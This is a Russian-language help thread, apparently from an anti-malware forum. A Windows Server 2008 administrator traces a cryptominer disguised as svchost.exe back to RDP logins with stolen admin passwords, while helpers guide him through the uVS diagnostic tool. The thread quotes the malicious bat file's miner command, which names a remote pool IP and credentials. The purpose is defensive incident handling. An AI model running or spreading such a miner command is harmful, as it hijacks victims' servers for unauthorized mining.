Ребята, имеется server2008, в котором регулярно появляется процесс svchost. ProcessExplorer ничего о нем сказать не смог, кроме того, куда он стучится (93.171.246.8:8882). Увы, антивирусное ПО ничего не находит.
Уже опытным путем установил, что если зарезать исходящий порт - эта зараза перебирает следующие 100 и снова начинает грузить систему на 100%. Пока пишу это сообщение - процесс сам по себе исчез. Руками убивать смысла нет - поднимается сам когда захочет.
Во вложении логи.
Есть у кого какие мысли?
- - - - -Добавлено - - - - -
отдельным постом прикрепляю скриншот
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) drone, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
отвечаю сам себе - это майнинг криптовалюты
запускается по цепочке taskmgr.exe-cmd.exe-svchost.exe одним из пользователей rdp
найти, что же запускается, пока не смог
Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
Дождитесь окончания работы программы и прикрепите лог к посту в теме.
!!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы.
После выполнения скрипта в папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
проблема осталась. прикладываю свежие логи с запущенной заразой.
руками уже истребил содержимое папки windows\api (поиск файл не находил. чтобы зайти в папку, мне понадобилось сделать себя ее владельцем)
в ней лежал bat с содержанием:
svchost -a scrypt-jane -o 93.171.246.8:8882 -u admin -p 123456
pause
и сам svchost.exe
истребил руками, могу поделиться образцом.
узнать бы еще, как он запускался...
В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
После выполнения скрипта в папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
содержимое папки api вычистил еще вчера, но для дела закинул назад svchost.exe и отправил образец после выполнения скрипта
теперь самое интересное:
ночью некто зашел под учеткой с правами админа (пароль сложный, порядка 15 символов), создал левого пользователя с правами user и сделал log off. перед этим запустил заразу на сервере с рабочего стола. это единственный пользователь с правами админа, у которого я еще не менял пароль.
утром увидел запущенный процесс svchost. процесс ссылался на рабочий стол, но исходника на раб столе уже не было. прибил процесс, папку с профилем, сам профиль, удалил подозрительные драйвера касперского (он не устанавливался, максимум запускался бесплатный сканер)
логи после скрипта с svchost.exe (все еще продолжает запускаться из несуществующих мест) :
В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
После выполнения скрипта в папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Копирование файла в Zoo: \\?\C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE
Нет доступа к файлу, возможно файл защищен [ C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE ]
(!) Не удалось получить доступ к C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE
Нет доступа к файлу, возможно файл защищен [ C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE ]
(!) Не удалось получить доступ к C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE
\\?\C:\USERS\MATV\DOWNLOADS\UVS\UVS\ZOO\SVCHOST.EXE.---
Не удалось скопировать файл [Отказано в доступе. ]
как и писал выше - пусто там, такое ощущение, что каждый раз подчищаются следы.
по поводу паролей - все оказалось гораздо хуже. не знаю как, но у третьих лиц оказались пароли от всех администраторских учеток. по логам посмотрел - после смены паролей, была ровно одна попытка входа на каждую из учеток с левого ip.
последний раз svchost.exe стартовал в четверг (parent = cmd.exe). на всякий случай восстановил и cmd.exe, хотя текущий размер совпадал с оригинальным. после этого проблема больше не беспокоит.
буду надеяться, что больше не повторится подобное.
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: